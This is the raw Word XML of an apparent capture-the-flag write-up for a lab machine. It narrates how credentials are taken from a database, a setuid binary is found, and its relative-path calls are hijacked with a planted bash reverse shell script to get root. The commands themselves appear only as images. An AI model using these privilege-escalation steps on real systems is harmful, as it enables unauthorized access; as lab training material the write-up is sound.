    <w:p w14:paraId="6E6B068D" w14:textId="735884BF" w:rsidR="00A52566" w:rsidRDefault="00A52566" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Looking at the db.php5 file, we got some credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9868E" w14:textId="1CD6E86C" w:rsidR="00A52566" w:rsidRDefault="00A52566" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52566">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="161096CC" wp14:editId="1575D592">
            <wp:extent cx="3665538" cy="6096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26F6" w14:textId="536D6A45" w:rsidR="00740BB4" w:rsidRDefault="00740BB4" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Using those creds to switch user to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>theseus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” doesn’t work, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>But</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> we know this is a database credential, we access the database and get more stuff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CABA66" w14:textId="133FB63D" w:rsidR="00740BB4" w:rsidRDefault="00740BB4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is not installed so I use “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791E599" w14:textId="59A984A1" w:rsidR="00740BB4" w:rsidRDefault="00740BB4" w:rsidP="00D82C18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Dumping the database “Magic” gives more credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57520B06" w14:textId="2F444ADF" w:rsidR="00740BB4" w:rsidRDefault="00740BB4" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00740BB4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69F92247" wp14:editId="15A4F2C2">
            <wp:extent cx="4008467" cy="2667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D536" w14:textId="4A1C29F4" w:rsidR="00A52566" w:rsidRDefault="004B735D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Using the creds from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqldump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, I can switch to user “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>theseus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35824A63" w14:textId="2FD87A07" w:rsidR="009F26DF" w:rsidRPr="009F26DF" w:rsidRDefault="009F26DF" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F26DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255A0D8C" w14:textId="77777777" w:rsidR="00EC63FC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After getting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>theseus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, I like to do some find commands to see what files belong to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36460015" w14:textId="1D0008B0" w:rsidR="004B735D" w:rsidRDefault="00EC63FC" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC63FC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002218D8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F9DE7F6" wp14:editId="7AD64CAB">
            <wp:extent cx="6120370" cy="30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3202" cy="3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64A1" w14:textId="0AC683E3" w:rsidR="002218D8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>Running this returns a lot of stuff that I am too lazy to look at.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9433AF" w14:textId="2974D18E" w:rsidR="002218D8" w:rsidRDefault="002218D8" w:rsidP="00D82C1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 decided to use groups instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01980716" w14:textId="5B1A79D5" w:rsidR="002218D8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If we use the groups command, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>theseus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> belongs to a group called “users”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C0CF33" w14:textId="69EBDA72" w:rsidR="002218D8" w:rsidRDefault="002218D8" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002218D8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38D8BBF1" wp14:editId="6DAEE749">
            <wp:extent cx="5814564" cy="4191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C3B" w14:textId="43B6255D" w:rsidR="002218D8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Running the find command with groups returns only 1 binary and it is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC445A4" w14:textId="7A498108" w:rsidR="002218D8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>I try running the binary and it returns a bunch of system information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC1F29" w14:textId="17FB9E5B" w:rsidR="002218D8" w:rsidRDefault="002218D8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I use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the “-f” flag to follow forks on the binary to get more information</w:t>
      </w:r>
      <w:r w:rsidR="003861C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I use grep to see what commands this binary is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6CBAC" w14:textId="261AA307" w:rsidR="003861C2" w:rsidRDefault="003861C2" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003861C2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FABC536" wp14:editId="0F3CAF38">
            <wp:extent cx="5943600" cy="1522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1969" w14:textId="702FD9CE" w:rsidR="003861C2" w:rsidRDefault="003861C2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The binary </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>doesn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> use absolute path which means we can abuse this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C3AB32" w14:textId="4AA4FB81" w:rsidR="003861C2" w:rsidRDefault="003861C2" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I write a simple bash reverse shell script called “free”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F250931" w14:textId="7BCB4258" w:rsidR="003861C2" w:rsidRDefault="003861C2" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003861C2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FBD230E" wp14:editId="55F697F1">
            <wp:extent cx="3398815" cy="449619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DCAC" w14:textId="557BDE43" w:rsidR="003861C2" w:rsidRDefault="003861C2" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Then I modify the $PATH and add the directory where my “free” script is located and put it before the others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782AFAD6" w14:textId="3BAD8916" w:rsidR="003861C2" w:rsidRDefault="003861C2" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003861C2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48815F36" wp14:editId="7B85C24C">
            <wp:extent cx="6565900" cy="3429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r="33718" b="-11339"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6595028" cy="34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A068" w14:textId="5CFDD061" w:rsidR="003861C2" w:rsidRDefault="003861C2" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Then I setup a listener on port 9002 and run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary and we got root!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C47082" w14:textId="7A1C6DCB" w:rsidR="003861C2" w:rsidRDefault="003861C2" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003861C2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9361DF" wp14:editId="4D1E8945">
            <wp:extent cx="4092295" cy="1135478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A6" w14:textId="77777777" w:rsidR="009F26DF" w:rsidRDefault="009F26DF" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0215E74C" w14:textId="77777777" w:rsidR="00A52566" w:rsidRDefault="00A52566" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A63DBC" w14:textId="77777777" w:rsidR="00A2238A" w:rsidRDefault="00A2238A" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB7AB85" w14:textId="77777777" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC42D72" w14:textId="77777777" w:rsidR="00D804B1" w:rsidRPr="00D82C18" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8FFDF7" w14:textId="77777777" w:rsidR="00D82C18" w:rsidRPr="00D82C18" w:rsidRDefault="00D82C18" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D82C18" w:rsidRPr="00D82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D55"/>
    <w:rsid w:val="00190BA7"/>
    <w:rsid w:val="002218D8"/>
    <w:rsid w:val="002E1D55"/>
    <w:rsid w:val="003825A1"/>
    <w:rsid w:val="003861C2"/>
    <w:rsid w:val="004B735D"/>
    <w:rsid w:val="00586499"/>
    <w:rsid w:val="00740BB4"/>
    <w:rsid w:val="009F26DF"/>
    <w:rsid w:val="00A2238A"/>
    <w:rsid w:val="00A27E5F"/>
    <w:rsid w:val="00A52566"/>
    <w:rsid w:val="00AA4986"/>
    <w:rsid w:val="00CE07D3"/>
    <w:rsid w:val="00D804B1"/>
    <w:rsid w:val="00D82C18"/>
    <w:rsid w:val="00E237FA"/>
    <w:rsid w:val="00EC63FC"/>
    <w:rsid w:val="00FF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31A6A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{926E7763-B627-4002-A58C-145109026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8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Denny</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Denny</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-18T13:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-25T19:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>